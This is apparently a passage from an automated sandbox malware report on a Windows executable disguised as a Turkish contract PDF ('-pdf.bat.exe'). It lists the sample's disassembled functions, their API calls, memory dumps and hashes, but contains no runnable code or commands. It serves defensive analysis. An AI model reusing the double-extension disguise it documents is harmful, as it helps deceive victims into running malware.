                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
                              • Instruction ID: 85b777fa610547d2183482adb232412925907ddbdaa1129d6a49a25a13354a82
                              • Opcode Fuzzy Hash: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
                              • Instruction Fuzzy Hash: 9D714671E04228DBDF28CF98C844BADBBB1FF44305F14816AD856BB281D778A986DF45
                              Function 00406F48 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
                              • Instruction ID: 068c41ea6699cb9b24c5d93e390f6e15a746ef4a0ce6273c00671ddd4a3661d6
                              • Opcode Fuzzy Hash: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
                              • Instruction Fuzzy Hash: E0715771E04228DBDF24CF98C844BADBBB1FF44305F15806AD856BB281C778AA86DF45
                              Function 004020DD Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00402108
                                • Part of subcall function 004055A6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                • Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                • Part of subcall function 004055A6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll,004033F2,004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405601
                                • Part of subcall function 004055A6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll), ref: 00405613
                                • Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                • Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                • Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00402119
                              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 00402196
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                              • String ID:
                              • API String ID: 334405425-0
                              • Opcode ID: d9c937c8948d5d37c50d665afaa08982dd07723c7233c08654f6d387f6d988e5
                              • Instruction ID: a8e1189db69026d3652efcc6ea6e12950466f7228f8283b9583ebcadfcee3162
                              • Opcode Fuzzy Hash: d9c937c8948d5d37c50d665afaa08982dd07723c7233c08654f6d387f6d988e5
                              • Instruction Fuzzy Hash: 8D215031904108BADF11AFA5CE49A9E7AB1BF44359F20413BF105B91E1CBBD89829A5D
                              Function 00401BA0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GlobalFree.KERNEL32(00000000), ref: 00401C10
                              • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: Global$AllocFree
                              • String ID: Call
                              • API String ID: 3394109436-1824292864
                              • Opcode ID: e33d9b87315d49944383bdaefc5ba1c13c649625d32d96b536ae23307826b8e2
                              • Instruction ID: 4f57f46d507340bd06d3479355973fa93edc06c360faa14cbfff374a5dc28ea7
                              • Opcode Fuzzy Hash: e33d9b87315d49944383bdaefc5ba1c13c649625d32d96b536ae23307826b8e2
                              • Instruction Fuzzy Hash: 5721F673904214EBDB30AFA8DE85A5F72B4AB08324714053FF642B32C4C6B8DC418B9D
                              Function 00402304 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0040687E: FindFirstFileW.KERNELBASE(76BF3420,00425F58,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,76BF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76BF3420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                • Part of subcall function 0040687E: FindClose.KERNEL32(00000000), ref: 00406895
                              • lstrlenW.KERNEL32 ref: 00402344
                              • lstrlenW.KERNEL32(00000000), ref: 0040234F
                              • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402378
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: FileFindlstrlen$CloseFirstOperation
                              • String ID:
                              • API String ID: 1486964399-0
                              • Opcode ID: c92c3ee3ae18d95aa1771da2fabd1cb2010788539e6b4ab8b952707b1b2048dc
                              • Instruction ID: e570f7e88bbeadde5f19d209a5805755c0aba3de4ac721a8bb04e236ab5037c1
                              • Opcode Fuzzy Hash: c92c3ee3ae18d95aa1771da2fabd1cb2010788539e6b4ab8b952707b1b2048dc
                              • Instruction Fuzzy Hash: 93117071D00318AADB10EFF9DD09A9EB6B8AF14308F10443FA401FB2D1D6BCC9418B59
                              Function 004025A3 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
                              • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,00000000,00000011,00000002), ref: 00402602
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: Enum$CloseValue
                              • String ID:
                              • API String ID: 397863658-0
                              • Opcode ID: ba34c4ace152f4771e18115f26e31f873f7731feb8842bd8527d51c3f02d9afa
                              • Instruction ID: fdeb1b79bd1b5feb028a75c257e649ad2cddb418c0fd83a6570d1db0005c2465
                              • Opcode Fuzzy Hash: ba34c4ace152f4771e18115f26e31f873f7731feb8842bd8527d51c3f02d9afa
                              • Instruction Fuzzy Hash: 7D017171904205BFEB149F949E58AAF7678FF40308F10443EF505B61C0DBB84E41976D
                              Function 0040252F Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402560
                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,00000000,00000011,00000002), ref: 00402602
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: CloseQueryValue
                              • String ID:
                              • API String ID: 3356406503-0
                              • Opcode ID: 56531dfc69c8a788bac7fcb245dee4885a6b683f52a9ec3ede9407be23b67ed3
                              • Instruction ID: b0e4e1b430255f92fa12a8c2637aeeefdc8d450e0dea4cce8f1fdd2cec8de2f5
                              • Opcode Fuzzy Hash: 56531dfc69c8a788bac7fcb245dee4885a6b683f52a9ec3ede9407be23b67ed3
                              • Instruction Fuzzy Hash: 61116A71900219EBDF14DFA0DA989AEB7B4BF04349F20447FE406B62C0D7B84A45EB5E
                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                              Download Yara Rule
                              APIs
                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                              • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID:
                              • API String ID: 3850602802-0
                              • Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                              • Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
                              • Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                              • Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C
                              Function 00402439 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040245B
                              • RegCloseKey.ADVAPI32(00000000), ref: 00402464
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: CloseDeleteValue
                              • String ID:
                              • API String ID: 2831762973-0
                              • Opcode ID: 729ecf5bba26eed59db8e40ba0825d20aa39ecfc350fd83ab66bb719c7a4b8e3
                              • Instruction ID: 823524eaaa32c5521ce5516f6f818df3cdafdbc5371ac3c1d9ba599ed9425974
                              • Opcode Fuzzy Hash: 729ecf5bba26eed59db8e40ba0825d20aa39ecfc350fd83ab66bb719c7a4b8e3
                              • Instruction Fuzzy Hash: 46F06232A04520ABDB10BBA89A8DAEE62B5AF54314F11443FE502B71C1CAFC4D02976D
                              Function 00405A75 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                              Download Yara Rule
                              APIs
                              • CreateDirectoryW.KERNELBASE(?,?), ref: 00405AB7
                              • GetLastError.KERNEL32 ref: 00405AC5
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: CreateDirectoryErrorLast
                              • String ID:
                              • API String ID: 1375471231-0
                              • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                              • Instruction ID: 25953aab165e2e3bb2b5eb59dc1d6ee29197e23c9d0e5a802ce790cbbbfebc39
                              • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                              • Instruction Fuzzy Hash: 33F0F4B1D1060EDADB00DFA4C6497EFBBB4AB04309F04812AD941B6281D7B982488FA9
                              Function 00401EE3 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                              Download Yara Rule
                              APIs
                              • ShowWindow.USER32(00000000,00000000), ref: 00401F01
                              • EnableWindow.USER32(00000000,00000000), ref: 00401F0C
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: Window$EnableShow
                              • String ID:
                              • API String ID: 1136574915-0
                              • Opcode ID: b342668e68410e2d968fedd3eb79c8682b657b25800b9077b5ecd2124e99ac37
                              • Instruction ID: a6cb0e5ea3b461fc76251f348ffd86be0a73501dc920cd99368f231d5504fafc
                              • Opcode Fuzzy Hash: b342668e68410e2d968fedd3eb79c8682b657b25800b9077b5ecd2124e99ac37
                              • Instruction Fuzzy Hash: F2E09A36A082049FE705EBA8AE484AEB3B0EB40325B200A7FE001F11C0CBB94C00866C
                              Function 00406915 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406942
                                • Part of subcall function 004068A5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
                                • Part of subcall function 004068A5: wsprintfW.USER32 ref: 004068F7
                                • Part of subcall function 004068A5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040690B
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                              • String ID:
                              • API String ID: 2547128583-0
                              • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                              • Instruction ID: 5852e889d14e736f2df1098d3b7202b06462132acdc852f75f804bf3a6ff6809
                              • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                              • Instruction Fuzzy Hash: FCE08673604310EBD61056755D04D2773A8AF95A50302483EFD46F2144D738DC32A66A
                              Function 00406011 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                              Download Yara Rule
                              APIs
                              • GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe,80000000,00000003), ref: 00406015
                              • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406037
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: File$AttributesCreate
                              • String ID:
                              • API String ID: 415043291-0
                              • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                              • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                              • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                              • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                              Function 00405ACF Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                              Download Yara Rule
                              APIs
                              • CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
                              • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405AE3
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: CreateDirectoryErrorLast
                              • String ID:
                              • API String ID: 1375471231-0
